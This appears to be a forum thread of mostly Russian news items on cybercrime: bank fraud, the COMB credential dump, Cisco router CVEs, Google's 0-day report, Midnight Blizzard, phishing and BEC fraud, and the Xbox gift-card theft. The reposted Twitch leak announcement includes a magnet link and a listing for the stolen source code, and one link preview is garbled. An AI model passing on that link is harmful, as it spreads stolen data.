Как отметил исследователь Sucuri Бен Мартин, устаревшее программное обеспечение и слабые пароли администраторов часто становятся целью для атак. Чтобы снизить риски, рекомендуется регулярно обновлять плагины и темы, использовать файрволлы для веб-приложений (WAF), проверять учётные записи администраторов и отслеживать изменения файлов сайта.
В Татарстане группа мошенников организовала хищение 30 млн рублей с банковского счета. За деньгами в банк приходил похожий на клиента дворник, одетый в модных бутиках. О резонансном случае рассказал замначальника управления угрозыска МВД по РТ Рамис Газимов.
По его словам, в 2022 году были задержаны 7 участников организованной группы, которая от имени клиента одного из банков похитила порядка 30 млн рублей.
«Даже нашли примерно похожего клиента. Являлся он обычным дворником, согласился на эту преступную деятельность. Его одели в модных бутиках по последнему писку моды, то есть настолько серьезно отнеслись к данному преступлению. И вот с 2017 года происходили эти факты хищений», — сказал Газимов на пресс-конференции «Раскрытие и профилактика мошенничества».
Всего доказано 9 фактов хищения, в настоящее время уголовное дело направлено в суд. Пятеро подозреваемых арестованы, двое находятся под подпиской о невыезде. Замначальника управления угрозыска подчеркнул, что этот случай является дистанционным мошенничеством, когда заказывают деньги в банке и получают их от имени клиента.
source: business-gazeta.ru/news/586787
Хакеры с лидером Алексеем Строгановым по кличке Flint24, которых судят в России за киберпреступления против США и ЕС, просятся на свободу, ибо хотят помочь Родине. Ну по крайней мере так они заявляют. Всего об освобождении просят 24 хакера — хотят замены наказания на любое, не связанное с лишением свободы. Утверждают, что сбежать они не смогут, ибо недружественные страны охотятся за ними, да и загранпаспортов ни у кого нет. Адвокаты хакеров планируют хадатайствовать об изменении меры пресечения на суде в июне.
Источник: <https://vc.ru/crypto/433982-hakery-prosyat-svobody-v-obmen-na- pomoshch-protiv-zapada>
В Twitch произошла утечка данных на 4chan с объемом более 120 Гбайт.
Мы представляем вам сегодня чрезвычайно опасную утечку:
Twitch - это американский сервис потокового видео в реальном времени, специализирующийся на потоковой передаче видеоигр, включая трансляции киберспортивных соревнований, управляемый Twitch Interactive, дочерней компанией Amazon.com, Inc.
Их сообщество также представляет собой отвратительную ядовитую выгребную яму, поэтому, чтобы способствовать еще большему сбою и конкуренции в пространстве потокового онлайн-видео, мы полностью взяли их, и, в части первой, выпускаем исходный код из почти 6000 внутренних репозиториев Git, в том числе:
Полнота twitch.tv с историей коммитов, уходящей корнями в самое начало
Клиенты Twitch для мобильных, настольных и игровых консолей
Различные проприетарные SDK и внутренние сервисы AWS, используемые Twitch
Любая другая собственность, которой владеет Twitch, включая IGDB и CurseForge
Неизданный конкурент Steam от Amazon Game Studios
Внутренние инструменты красной команды Twitch SOC (смеется)
Отчеты о выплатах авторам за период с 2019 г. по настоящее время. Узнайте,
сколько на самом деле зарабатывает ваш любимый стример!
Torrent (128GB):
magnet:?xt=urn:btih:N5BLZ6XECNEHHARHJOVQAS4W7TWRXCSI&dn=twitch-leaks-part-
one&tr=udp%3A%2F%2Fopen.stealth.si%3A80%2Fannounce
Repository listing: https://dpaste.org/MvoM
Джефф Безос заплатил за это 970 миллионов долларов, мы раздаем их БЕСПЛАТНО.
Источник: https://boards.4channel.org/g/thread/83691438#p83691438
About 3.27 billion stolen account logins have been posted to the RaidForums
English-language cybercrime community in a ‘COMB’ collection.
A “compilation of many breaches” – COMB for short – has been leaked on the
cyber-underground, according to researchers. The so-called COMB contains a
staggering 3.27 billion unique combinations of cleartext email addresses and
passwords.
The trove is an aggregate database that brings together older stolen data from
breaches past – including credentials from Netflix, LinkedIn, Exploit and
others. COMB – which was given that name by the person who posted it online –
was first made public on Feb. 2 by a user dubbed “Singularity0x01,” a
researcher told Threatpost.
“On February 2, 2020, user Singularity0x01 created a thread on the popular
English-language cybercriminal forum RaidForums titled ‘Compilation of Many
Breaches (COMB) 3.8Billion (Public),'” Ivan Righi, cyber-threat intelligence
analyst at Digital Shadows, said.
He added, “Singularity0x01 stated that the collection was built on a previous
breach compilation that contained 1.4 billion records, and that the contents
were mostly publicly available. The user also said that the data was presented
in an alphabetical order and in a tree-like structure.”
In order to view the download link for the password-protected .ZIP file containing the data, forum users were asked to spend 8 RaidForums credits (about $2), he added. Then, they can use the database’s built-in tool for querying and sorting the information to slice and dice the data.
The data itself was not that well-received by underground denizens, Righi noted.
“Some users claimed that files were corrupted, files were missing, the total number of credentials was smaller than advertised, and the data was of low quality,” he explained – all of which led to Singularity0x01 gaining a negative reputation rating on the criminal forum.
“Singularity0x01 had also created two identical threads on the forum, leading some users to spend their tokens twice,” the researcher said. “Singularity0x01 was permanently banned from RaidForums on 08 Feb 2021 for ‘leaking hidden content,’ although no further information was provided by the site’s moderators.”
Dustin Warren, senior security researcher at SpyCloud, also took a look at the data and determined that the login combos have been in Dark Web circulation for some time.
“The 3.2 billion number by itself looks staggering, but we have to remember ‘quality vs. quantity,'” he told Threatpost. “The data appears to be full of account credentials that had been part of previously known breaches. In fact, this one appears to be a re-release of the [Collection Combos leak from 2019](https://threatpost.com/collection-1-data-dump-hacker- identified/141447/), the Anti Public Combo list from 2016 and potentially others, but released with some tools for deduping, sorting and parsing of the data to make it easier to use. In other words, there is nothing new here.”
The data may be old, but it’s not without value. Thanks to password reuse, hackers can use the data to mount brute-force or [credential-stuffing attacks](https://threatpost.com/spotify-credential-stuffing- cyberattack/163672/) in an effort to hijack any number of types of accounts. And from there, the potential fallout becomes notable.
“It is an important reminder that old passwords can come back to haunt users who reuse them across accounts, which is why even old data can be useful to criminals,” Warren said. “Threat actors are no doubt running credential- stuffing attacks with this data so any accounts using the same logins and passwords could still be in jeopardy.”
Online banking, social-media, patient portals, loyalty points accounts and others all contain reams of information that can be used for financial fraud or to mount convincing follow-on phishing attack, for instance. And, work log- ins and email accounts that are compromised can lead to espionage efforts or business email compromise (BEC).
As always, implementing multifactor authentication (MFA) and maintaining good password hygiene (strong, unique passwords for all accounts and regular password rotation) can prevent much of the potential fallout from being caught up in this incident.
“A significant number of hacking-related breaches are still tied to weak passwords and the absence of MFA,” Terence Jackson, CISO at Thycotic, told Threatpost. “Use of a password manager and MFA are still two of the best ways online accounts can be protected from brute-force and password-spraying attacks. These ‘keys to the kingdom’ are what malicious actors covet because it gives them access to wreak havoc.”
“While MFA can prevent direct use of the credentials on services such as Office 365, it’s important to remember that MFA is not a silver bullet.
“Simple credentials would still be useful in conjunction with some other compromised asset as that would allow the attacker to overcome MFA,” Oliver Tavakoli, CTO at Vectra, told Threatpost. “Of course, this points out the criticality of enabling (and requiring) MFA for all authentication – especially for services (such as Office 365) directly accessible from the internet.”
Cisco выпустила исправление, устраняющее уязвимость безопасности с высоким уровнем риска в маршрутизаторах Small Business RV016, RV042, RV042G и RV082, которой можно было злоупотреблять для получения root-доступа в базовой операционной системе.
Ошибка, получившая идентификатор CVE-2023-20025 (оценка CVSS: 9,0), была
описана как уязвимость обхода аутентификации, вызванная неправильной проверкой
пользовательского ввода во входящих HTTP-пакетах.
Отправив специально созданный HTTP-запрос в веб-интерфейс управления,
злоумышленник может воспользоваться этой уязвимостью, чтобы обойти
аутентификацию и получить root-доступ в базовой операционной системе.
«Эта уязвимость связана с неправильной проверкой пользовательского ввода во
входящих HTTP-пакетах. Злоумышленник может воспользоваться этой уязвимостью,
отправив созданный HTTP-запрос в веб-интерфейс управления.
Успешный эксплойт может позволить злоумышленнику обойти аутентификацию и
получить root-доступ к базовой операционной системе», — предупредила Cisco в
бюллетене.
CVE-2023-20025 влияет на веб-интерфейс управления маршрутизаторами Cisco Small
Business RV016, RV042, RV042G и RV082.
Другая уязвимость, отмеченная как CVE-2023-20026 (оценка CVSS: 6,5), также
затрагивает маршрутизаторы Cisco Small Business RV016, RV042, RV042G и RV082.
Ошибка была описана как уязвимость удаленного выполнения команд.
Отправив специально созданный HTTP-запрос в веб-интерфейс управления,
злоумышленник может использовать эту уязвимость для выполнения произвольных
команд на уязвимом устройстве.
Cisco поблагодарила Хоу Люяна из Qihoo 360 Netlab за сообщение об ошибках.
Cisco PSIRT известно, что для этой уязвимости доступен экспериментальный код
эксплойта, но не обнаружено злонамеренного использования этой уязвимости.
Cisco отметила, что «** не выпускала и не будет выпускать обновления
программного обеспечения, устраняющие эту уязвимость** ».
Чтобы перенести эти уязвимости, администраторы могут отключить удаленное
управление и заблокировать доступ к портам 443 и 60443.
[источник](https://securityonline.info/cve-2023-20025-authentication-bypass- vulnerability-in-cisco-small-business-rv016-rv042-rv042g-and-rv082-routers/)
Спецслужбы США издали рекомендации по противодействию хакерам, якобы связанным с Россией.
Американские ведомства, занимающиеся обеспечением безопасности в киберпространстве, подготовили для различных организаций и специалистов в США рекомендации по защите от хакеров, которые по версии американской стороны, находятся в России.
В документе перечисляются основные приемы, которые могут использовать «русские хакеры», указаны самые масштабные атаки и предложены новые способы того, как снизить уязвимость американских систем.
«CISA, ФБР и АНБ призывают сообщество кибербезопасности, особенно тех, кто отвечает за защиту сетей критических инфраструктур, поддерживать состояние повышенной готовности и вести проактивную охоту за угрозами», — сказано в публикации.
Российские власти отрицают причастность к хакерским атакам на американские государственные структуры и частные компании. С прошлого года обе страны ведут консультации на тему кибербезопасности.
source: cisa.gov/uscert/ncas/alerts/aa22-011a
В комментариях к его сообщению в Twitter пользователи скептически спрашивают,
неужели Илон Маск настолько уверен в безопасности серверов своих компаний.
Накануне американский предприниматель и инженер Илон Маск опубликовал на своей страничке изображений, которое у общества ассоциируется с известной хакерской группой Anonymous, с неожиданной подписью: «Ханна Монтана — это Майли Сайрус».
Этот пост сопровождали всего два восклицательных знака, но его уже лайкнули или ретвитнули около 400 тыс. раз. Ханна Монтана — героиня одноимённого подросткового сериала, которую играла певица Майли Сайрус. Последняя уже успела ответить Илону Маску с шутливым негодованием по этому поводу: «Я же рассказала вам это по секрету! Вы можете построить ракету, но не можете ничего сохранить в секрете?!».
«На самом деле Ханна Монтана — это Майли Сайрус», — подшутил владелец SpaceX, обнародовав всем известную тайну. В сериале «Ханна Монтана» (2006–2011) Сайрус сыграла школьницу по имени Майли Стюарт, которая скрывает, что она поп-звезда Ханна Монтана.
Напомним, что хакеры из группы Anonymous обвинили миллиардера Илона Маска в чрезмерном влиянии на курс биткоина и пренебрежении к инвестициям обычных людей. Свое обращение к предпринимателю «анонимы» опубликовали в Сети. «Миллионы розничных инвесторов рассчитывали на то, что прибыль от криптовалют улучшит их жизнь. <...> Конечно, они взяли риск на себя, когда инвестировали, все знают, что нужно быть готовым к волатильности криптовалют, но твои твиты на этой неделе показывают явное пренебрежение к обычному работающему человеку», — говорится в видеообращении хакеров.
Подробнее: https://www.securitylab.ru/news/521231.php
Специалисты Google опубликовали технические подробности о четырех уязвимостях нулевого дня, которые использовались в этом году для таргетированных хакерских атак. Баги применялись для атак на пользователей браузеров Chrome, Internet Explorer и Safari для iOS.
Речь в отчете специалистов идет о следующих уязвимостях:
CVE-2021-21166 и CVE-2021-30551 в Chrome;
CVE-2021-33742 в Internet Explorer;
CVE-2021-1879 в WebKit (Safari).
По информации Google, три уязвимости нулевого дня в Chrome и IE были «созданы одной и той же коммерческой компанией, разрабатывающей средства для наблюдения» (речь идет о неназванном брокере уязвимостей), которая затем продала их двум неназванным группировкам, чью деятельность поддерживают власти. Не раскрывая никаких имен и названий, специалисты утверждают, что три из четырех уязвимостей использовались в атаках, направленных на цели в Армении.
К примеру, эксплоиты для уязвимостей CVE-2021-21166 и CVE-2021-30551 в Chrome распространялись при помощи одноразовых ссылок, которые отправляли по почте будущим жертвам. Такие ссылки вели на сайты, имитирующие различные законные ресурсы.
«Когда цель кликала по ссылке, ее перенаправляли на веб-страницу, которая осуществляла фингерпринтинг устройства, собирала системную информацию о клиенте и генерировала ключи ECDH для шифрования эксплоитов, а затем передавала эти данные обратно на эксплоит-сервер. Информация, собранная на этапе фингерпринтинга, включала разрешение экрана, часовой пояс, языки, плагины для браузера и доступные типы MIME. Эту информацию злоумышленники собирали, чтобы решить, следует ли доставлять эксплоит цели», — гласит отчет.
Также команда экспертов заявила, что проблема CVE-2021-21166 влияла и на движок браузера Safari (WebKit), в силу некоторой общности кодовой базы. Исследователи передали собранную информацию Apple, которая оперативно устранила проблему, присвоив ей идентификатор CVE-2021-1844.
«У нас нет никаких доказательств того, что эта уязвимость использовалась для направленных атак на пользователей Safari», — отмечают в Google.
Что касается 0-day уязвимости в IE (CVE-2021-33742), которую Microsoft исправила в июне, Google пишет, что этот баг тоже использовался против неких целей в Армении. Проблему эксплуатировали посредством электронных писем, содержавших вредоносные документы Office. Они загружали веб-контент внутри Office через встраиваемый компонент Internet Explorer. Как и в случае с Chrome, атака включала в себя фингерпринтинг и проверку жертвы, прежде чем злоумышленники переходили к внедрению пейлоада второго этапа.
Сходство двух этих вредоносных кампаний заставило специалистов Google предположить, что эксплоиты, скорее всего, были созданы одним и тем же брокером эксплоитов.
Также отчет гласит, что были выявлены атаки с использованием уязвимости CVE-2021-1879, представлявшей угрозу для WebKit для iOS. Эти атаки в Google приписывают «потенциальному злоумышленнику, поддерживаемому российским правительством».
Атаки осуществлялись через LinkedIn Messenger, функцию LinkedIn, которая позволяет пользователям обмениваться сообщениями. Злоумышленники использовали LinkedIn для отправки сообщений с вредоносными ссылками различным правительственным чиновникам из стран Западной Европы. Если жертва открывала такую ссылку через браузер Safari на iOS, эксплоит отключал защиту Same- Origin-Policy, чтобы «похитить аутентификационные файлы cookie нескольких популярных веб-сайтов, включая Google, Microsoft, LinkedIn, Facebook и Yahoo, а затем отправьте их через WebSocket на IP-адрес, контролируемый злоумышленниками».
Данный эксплоит представлял опасность для iOS версий с 12.4 по 13.7, и Google сообщает, что эксплуатация этой же уязвимости была замечен и в других вредоносных кампаниях, задокументированных специалистами компаний Microsoft и Volexity весной текущего года. Тогда эксперты приписали эти атаки русскоязычной хак-группе Nobelium (она же APT29 и Cozy Bear).
• Source: <https://blog.google/threat-analysis-group/how-we-protect- users-0-day-attacks/>
Видимо была довольно дерзкая атака на СНГ. Могу только предположить, что от недружественной страны. Жалко что информации мало, но я уверен что ленивая коала станет напуганной коалой.
CNews ](https://www.cnews.ru/news/top/2024-04-04_positive_technologies_obnaruzhil_novuyu)
ÐкÑпеÑÑнÑй ÑенÑÑ Ð±ÐµÐ·Ð¾Ð¿Ð°ÑноÑÑи Positive Technologies обнаÑÑжили кибеÑгÑÑппиÑовкÑ, аÑакÑÑÑие компании из РоÑÑии и ближнего...
www.cnews.ru
"Специалисты экспертный центр безопасности PT Expert Security Center (PT ESC) обнаружил серию атак, направленных на организации из России, Белоруссии, Казахстана, Узбекистана, Киргизии, Таджикистана и Армении. Жертвами атак стали государственные и финансовые компании, а также медицинские и образовательные учреждения из перечисленных стран.
Хакеры Lazy Koala не прибегает к изощренному инструментарию, тактикам и техникам, но при этом добивается успеха. Их основное оружие - примитивный стилер, написанный на языке Python, который, по нашим предположениям, распространяется при помощи старого доброго фишинга. Мошенники убеждают жертву открыть вложение и запустить нужный файл в браузере», - рассказал руководитель отдела исследования киберугроз экспертного центра безопасности Positive Technologies.
Бэкдор от Lazy Koala хорошо маскируется, а имена его исполняемых файлов похожи на названия легального ПО. Установленный на зараженных машинах, ряд образцов имеет действительную цифровую подпись. Разработчики Lazy Koala скрыли вредоносный код от анализа и детектирования с помощью упаковщиков разных видов, которые сжимают файлы, чтобы максимально усложнить обнаружение зловредного ПО."
В США предложили наложить рекордный штраф в $300 млн. на двух телефонных мошенников.
Федеральная комиссия по связи США (FCC) предложила наложить штраф в размере почти $300 млн. на двух мужчин, обвиняемых в использовании схемы автоматических звонков с предложениями автострахования.
Согласно заявлению FCC, жители Калифорнии Рой Кокс-младший и Майкл Аарон Джонс провели кампанию, в результате которой в течение 3-ёх месяцев 2021 года роботы сделали 5 млрд. звонков 500 млн. человек. Предлагаемый штраф является крупнейшим в истории FCC.
Звонки проводились через их компанию Sumco Panama, «а также через другие отечественные и международные организации (некоторые из них расположены в Панаме и Венгрии).
Звонки пытались ввести людей в заблуждение, заставив их думать, что срок их страховки истекает, и заставить их перейти к «специалисту по страхованию». Помимо совершения мошеннических звонков роботами, мужчин обвиняют в спуфинге – звонящие роботы имитировали номера местных операторов.
Несмотря на то, что многие автоматические звонки исходили от иностранных абонентов, в звонках использовалась тактика «подмена соседей», чтобы номер звонящего был похож на номер местных абонентов.
Рой Кокс-младший и Аарон Джонс входят в число 22 ответчиков по иску , поданному генеральным прокурором Огайо в июле. Тогда же против них был подан судебный иск: FCC уполномочила телефонных провайдеров заблокировать весь трафик, связанный с операцией.
souce: ohioattorneygeneral.gov/Media/News-Releases/July-2022/Yost-Files-Suit- Alleging-Massive-Robocall-Scheme-F
The company blamed it on a "sophisticated and highly-targeted phishing attack" that took place on February 5, 2023, targeting its employees.
Having successfully compromised one of the employees, the hackers were able to gain access to the company's internal business systems, steal internal documents and source code. Reddit representatives say that the attackers used a phishing bait and attacked employees, trying to lure them to a landing page that mimicked one of the Reddit intranet sites
Among the stolen data there was also information about the company's contacts and the contact details of some current and former employees. In addition, the stolen data contained some information about advertisers, but bank card information, passwords, and advertising performance metrics were not disclosed.
The company, however, stressed that there is no evidence to suggest that its
production systems were breached or that users' non-public data has been
compromised. There is no indication (yet
)
that the accessed information has been published or distributed online.
Happy days.
Sources:
[https://web.archive.org/web/2/https.../reddit-suffers-security-breach-
exposing.html](https://web.archive.org/web/2/https://thehackernews.com/2023/02/reddit-
suffers-security-breach-exposing.html)
https://xakep.ru/2023/02/10/reddit-hacked/
<https://www.darkreading.com/attacks-breaches/reddit-breached-with-stolen-
employee-credentials>
Подарочная карта Xbox – код из 25 символов, с которым можно купить игры в фирменном магазине. Так что подарочные карты можно рассматривать как своего рода цифровую валюту.
Bloomberg пишет, что эти карты продавались гораздо дешевле заявленной стоимости. А виноват во всем украинец Владимир Квашук. Он работал в компании Microsoft и попросту воровал коды подарочных карт. Ему удалось украсть миллионы, которые он потратил на несколько новых домов и новую Tesla.
Сотрудник компании
Владимир Квашук начал работать в компании в 2017 году. Его наняли тестировать инфраструктуру электронной коммерции. Его команда имитировала покупки в интернет-магазине Microsoft и искала сбои в платежной системе.
Если бы Квашук заказал в магазине ноутбук Dell и расплатился рабочей картой Microsoft – система бы совершила заказ и провела транзакцию, но не отправила бы заказ на выгрузку товара. Система понимала, что это тест. Так Квашук должен был документировать все ошибки, которые появлялись в системе.
Ошибка, которая изменила жизнь
Квашук заметил, что, когда он тестировал покупку подарочных карт, система выдавала ему настоящие коды. Он понял, что может генерировать неограниченное количество бесплатных кодов.
Квашук начал продавать карты от $10 до $100 и за два года своровал 152 тыс. подарочных карт Xbox на сумму $10,1 млн. Чтобы компания не разоблачила его, программист украл логины и пароли своих коллег и «покупал» карты через VPN.
В январе 2018 года Квашук создал компьютерную программу PurchaseFlow.CS, чтобы ускорить работу. С помощью нескольких кликов он мог выбрать номинал подарочной карты (30, 75, 100), вывод валюты (доллары США, евро, британские фунты) и количество покупок.
Все подарочные карты он продавал со скидкой в 55%.
Всплеск покупок
В 2018 году компания заметила странный всплеск покупок – в два раза больше, чем обычно. Начали расследование и допросили сотрудников команды по тестированию системы. Оказалось, что сотрудники в отчетах указывали свои данные и любой, кто получал отчет, мог войти в аккаунт и украсть карты из-за ошибки.
Как его разоблачили
ФБР и внутренняя служба расследования Microsoft выяснили, что, хоть Квашук и скрывал свой IP-адрес, все покупки осуществлялись с одного ноутбука на базе Linux со старым браузером Firefox. Это и дало предлог провести обыск в его доме.
Когда федералы попали в дом украинца, они нашли черновые записи о покупках подарочных карт, данные криптокошелька, куда он выводил деньги. Также агенты нашли записку, в которой Квашук расписал, куда он потратит свои миллионы.
Тюремный срок
Квашука арестовали в 2019 году. Он так и не признал свою вину, но Microsoft выставила ему счет на $8,3 млн. В тюрьме он пробудет до 2027 года.
«Он сгенерировал коды подарочных карт, чтобы помочь компании. Чем больше бесплатных игр Xbox раздавал Квашук, тем популярнее становилась платформа, увеличивая общие расходы», – заявил адвокат Квашука.
Злоумышленники из КНДР [закончили](https://thehackernews.com/2024/01/north-
koreas-cyber-heist-dprk-hackers.html) 2023-й на мажорной ноте: за год они
украли не меньше $600 миллионов. С учётом нескольких взломов под конец года
сумма может достичь $700 миллионов. Несмотря на то, что рекордный 2022-й с его
$850 миллионами побить не удалось, северокорейцы были ответственны за треть
всех криптокраж прошлого года.
Санкции в адрес миксера Sinbad не особо повлияли на отмывание средств — группировка постоянно ищет новые платформы, готовые обрабатывать их транзакции. Переводимую в USDT и Tron крипту в итоге обменивают на валюту через внебиржевые сделки и финансируют военный комплекс КНДР. Ну а с учётом прогнозируемого роста крипторынка в этом году, можно делать ставки, удастся ли неутомимым северокорейским криптостахановцам побить свой рекорд 2022-го года.

Cryptocurrency in 2023 ](https://thehackernews.com/2024/01/north-koreas-cyber- heist-dprk-hackers.html)
North Korean hackers have stolen over $600M in crypto in 2023! A significant threat to global financial security.
 thehackernews.com
Гражданин Индии признал себя виновным в сговоре с целью совершения мошенничества, так как использовал фиктивный сайт Coinbase для кражи учетных данных пользователей, что в итоге принесло ему более 37 млн долларов США.
30-летний Чираг Томар (Chirag Tomar) был арестован в аэропорту Атланты 20 декабря 2023 года в результате расследования, проведенного Секретной службой США при содействии ФБР.
По информации правоохранителей, в июне 2021 года Томар и его подельники создали фальшивый сайт, имитирующий реальный ресурс Coinbase Pro. Фейковый сайт coinbasepro[.]com должен был обмануть пользователей Coinbase, чтобы те ввели свои учетные данные и коды двухфакторной аутентификации, считая, что используют настоящий сайт.
Платформа Coinbase Pro уже не существует, но раньше она предназначалась для профессиональных криптовалютных трейдеров и инвесторов, предлагая им различные расширенные возможности. Coinbase Pro закрылась 9 ноября 2022 года, а ее функциональность и дополнительные возможности в итоге были интегрированы в основную платформу Coinbase.
Фишинг через поддельный Coinbase Pro осуществлялся в том числе с помощью социальной инженерии: жертвам, попавшим на сайт, показывали фальшивую ошибку при попытке входа в систему и предлагали позвонить представителю Coinbase (разумеется, ненастоящему). В итоге этот человек проникал в систему жертвы, используя ПО для удаленного доступа.
«В некоторых случаях жертв обманом убеждали разрешить фальшивым представителям Coinbase использовать ПО для удаленного доступа, что позволяло мошенникам получить контроль над компьютерами жертв и доступ к их законным аккаунтам Coinbase, — сообщает Министерство юстиции США. — Также мошенники выдавали себя за представителей службы поддержки Coinbase и обманом вынуждали пользователей сообщать им по телефону коды двухфакторной аутентификации».
Click to expand...
К примеру, одна из жертв из Северной Каролины лишилась цифровых активов на сумму 240 000 долларов из-за фальшивого сайта Coinbase Pro.
«Как Томар признал в суде, он контролировал ряд криптовалютных кошельков, на которые поступали сотни транзакций с криптовалютой, украденной со счетов пострадавших пользователей Coinbase, на общую сумму в десятки миллионов долларов, — пишут правоохранители. — После того как Томар получал украденную криптовалюту, он быстро конвертировал ее в другие виды цифровых активов или перемещал средства между множеством кошельков, контролируемых им и другими лицами. В конечном итоге криптовалюта конвертировалась в наличные, которые затем распределялись между Томаром и его сообщниками».
Click to expand...
По данным следствия, похищенные средства Томар использовал для покупки предметов роскоши, включая часы Rolex, автомобили Lamborghinis и Porsche, а также для поездок в Дубай и Таиланд.
Теперь мошеннику грозит максимальное наказание в виде тюремного заключения сроком до 20 лет и штраф в размере 250 000 долларов. Даты следующих слушаний и вынесения приговора пока не определены.
Нигерийца приговорили к 10 годам тюрьмы в США за кражу почти $20 миллионов с помощью кибермошенничества. 33-летний Бабатунде Фрэнсис Аени, проживавший ранее в Великобритании, признал вину и получил свой срок на этой неделе.
Аени совместно с двумя соучастниками — Фейсисайо Огунсанво и Юсуфом Ласиси — организовал схему компрометации деловой электронной почты (Business Email Compromise, BEC), направленную на сделки в сфере недвижимости в США. Преступники рассылали фишинговые письма с вредоносными вложениями сотрудникам агентств недвижимости, юристам и компаниям, занимающимся оформлением сделок с недвижимостью. Получив доступ к учетным данным, мошенники следили за перепиской и перехватывали сообщения о предстоящих переводах. Затем от имени компаний они направляли покупателям поддельные реквизиты для оплаты, направляя средства на свои счета.
Среди более чем 400 пострадавших 231 человек так и не смогли вернуть свои деньги, переведённые на счета злоумышленников. Общий ущерб составил $19 599 969,46. Особенно тяжело было людям, потерявшим все свои сбережения на покупку жилья. Многие жертвы представили суду свои заявления, рассказывая о стыде и депрессии после утраты денег.
В материалах дела упоминаются случаи, когда жертвы теряли суммы более $100 000. Полученные преступниками деньги использовались для покупки биткоинов через Coinbase, которые затем переводились на 3 разных адреса. Среди пострадавших оказалась и одна из компаний по оформлению сделок с недвижимостью в штате Алабама.
Двое соучастников Аени — Огунсанво и Ласиси — до сих пор находятся на свободе. Известно, что Огунсанво потратил $40 000 украденных средств в магазине Louis Vuitton в Дубае.
justice[.]gov/usao-sdal/pr/nigerian-national-sentenced-ten-years-20-million- cyber-fraud-scheme
Представители Microsoft сообщили, что недавно русскоязычная хак-группа Midnight Blizzard получила доступ к некоторым внутренним системам и репозиториям компании. Атакующие использовали аутентификационные данные, похищенные во время январской атаки на Microsoft.
Напомним, что в середине января 2024 года Microsoft обнаружила, что была взломана русскоязычной группировкой Midnight Blizzard (она же Nobelium, APT29 и Cozy Bear). Тогда сообщалось, что ряд корпоративных email-аккаунтов компании оказался скомпрометирован, а данные похищены.
Хакеры провели в системах Microsoft больше месяца и взломали электронную почту руководителей компании, сотрудников юридического отдела и специалистов по кибербезопасности. Причем в некоторых из украденных писем содержалась информация о самой хак-группе, что позволяло злоумышленникам понять, что Microsoft о них знает.
В компании рассказывали, что хакеры проникли в системы еще в ноябре 2023 года, после того как провели успешную брутфорс-атаку типа password spray (перебор ранее скомпрометированных или часто используемых паролей).
Позже Microsoft опубликовала более детальный отчет об инциденте. Выяснилось, что хакеры использовали резидентные прокси и технику password spray, сконцентрировавшись на небольшом количестве учетных записей. Причем один из атакованных аккаунтов оказался «устаревшей, непроизводственной учетной записью тестового тенанта». Microsoft подтвердила, что многофакторная аутентификация для этого аккаунта была отключена, что позволило атакующим получить доступ к системам Microsoft (после того, как они подобрали правильный пароль).
В компании объясняли, что тестовая учетная запись по ошибке имела доступ к приложению OAuth с привилегированным доступом к корпоративной среде Microsoft. Именно этот расширенный доступ и позволил хакерами создать дополнительные OAuth-приложения для получения доступа к другим корпоративным почтовым ящикам.
Как теперь [рассказали в Microsoft](https://msrc.microsoft.com/blog/2024/03/update-on-microsoft- actions-following-attack-by-nation-state-actor-midnight-blizzard/), недавно Midnight Blizzard использовала секреты, найденные среди украденных во время январской атаки данных, чтобы получить доступ к некоторым системам и репозиториям исходного кода.
«В последние недели мы обнаружили доказательства того, что Midnight Blizzard использует информацию, полученную из наших корпоративных систем электронной почты, для получения или попытки получения несанкционированного доступа. Включая доступ к некоторым репозиториям исходного кода и внутренним системам компании. На данный момент мы не нашли никаких доказательств того, что системы клиентов, размещенные на хостинге Microsoft, были взломаны», — сообщили специалисты Microsoft Security Response Center.
Click to expand...
Хотя Microsoft не объяснила, о каких именно «секретах» идет речь, скорее всего, имелись в виду токены аутентификации, ключи API и учетные данные. В компании заверили, что уже начали работу с клиентами, чьи данные попали в руки хакеров через украденные письма.
«Очевидно, что Midnight Blizzard пытается использовать секреты различных типов, которые удалось обнаружить. Некоторые из этих секретов передавались между клиентами и Microsoft по почте. По мере того, как мы обнаруживали их среди украденной электронной почты, мы связывались и продолжаем связываться с этими клиентами, чтобы помочь им принять меры по предотвращению возможных последствий», — говорят в Microsoft.
Click to expand...
Кроме того в компании предупредили, что в последнее время Midnight Blizzard наращивает password spray атаки на целевые системы: в феврале их количество увеличилось в 10 раз по сравнению с январем 2024 года.
За такое преступление тамбовчанину максимально грозит до 4 лет колонии со штрафом до 200 тысяч рублей.
В Тамбове задержан 38-летний мужчина, подозреваемый в создании, использовании и распространении вредоносных компьютерных программ. Об этом сообщило Региональное управление ФСБ России.
Как сообщили в пресс-службе ведомства, в июле 2022 года злоумышленник использовал вредоносную программу, чтобы получить доступ к сетевому оборудованию финансовой организации. Компьютерный вирус нейтрализовал системы защиты информации.
На данный момент возбуждено уголовное дело по статье "Создание, использование и распространение вредоносных компьютерных программ". Мужчине грозит до 4 лет лишения свободы и штраф в размере 200 тысяч рублей
Несмотря на тюремный срок и еще один арест, 50-летний француз наслаждается жизнью.
Как сообщал SecurityLab в феврале нынешнего года, некто Гэри Боузер (Gary Bowser) получил три года тюрьмы за участие в хакерской группировке Team Xecutor, продававшей взломанные консоли Nintendo, на которых можно играть в пиратские игры. Однако напарник Боузера, руководитель группировки Макс Луарн (Max Louarn), по-прежнему на свободе. Несмотря на проблемы с законом и даже арест в Танзании, 50-летний француз наслаждается жизнью вместе со своей девушкой, бывшей моделью из России, в живописном городе Авиньон на юге Франции.
Луарн увлекся хакингом в 1980-х годах. Сначала он взламывал свой домашний компьютер Commodore 64 ради развлечения, однако безобидное хобби со временем переросло в неплохой источник дохода.
«Я не собирался быть инженером с зарплатой 5 тыс. евро в месяц, когда в 18 лет понял, что хакинг – это не только весело, но еще и приносит много денег. Воровать у компаний, зарабатывающих миллиарды, почему бы и нет?», – признался хакер изданию Le Monde в недавнем интервью.
MAXiMiLiEN (хакерский псевдоним Луарна из 1990-х) продавал взломанные игры, генераторы ключей и ПО до 1993 года, когда он был арестован по обвинению в пиратстве… компанией Nintendo! Хакер улетел в Испанию, но правоохранительные органы хитростью заманили его в США, отправив от имени его друга поддельное приглашение на вечеринку в честь дня рождения. Как только Луарн сошел с самолета, его тут же арестовали.
Француз признал свою вину и отсидел в американской тюрьме пять лет. В 2005 году на хакера подала в суд компания Sony, обвинив его в пиратстве и потребовав возмещение убытков в размере $5 млн.
По мнению Луарна, в Nintendo его считают заклятым врагом.
«Они меня ненавидят. Ручаюсь, в их офисе в Токио висит моя фотография», – смеется хакер.
Однако сам он считает себя не злодеем, а скорее, бунтарем.
«Мы всегда выступали за свободу. Таков наш образ мышления: делать с машинами все что пожелаем, и чтобы у всех был доступ к ним», – заявил Луарн.
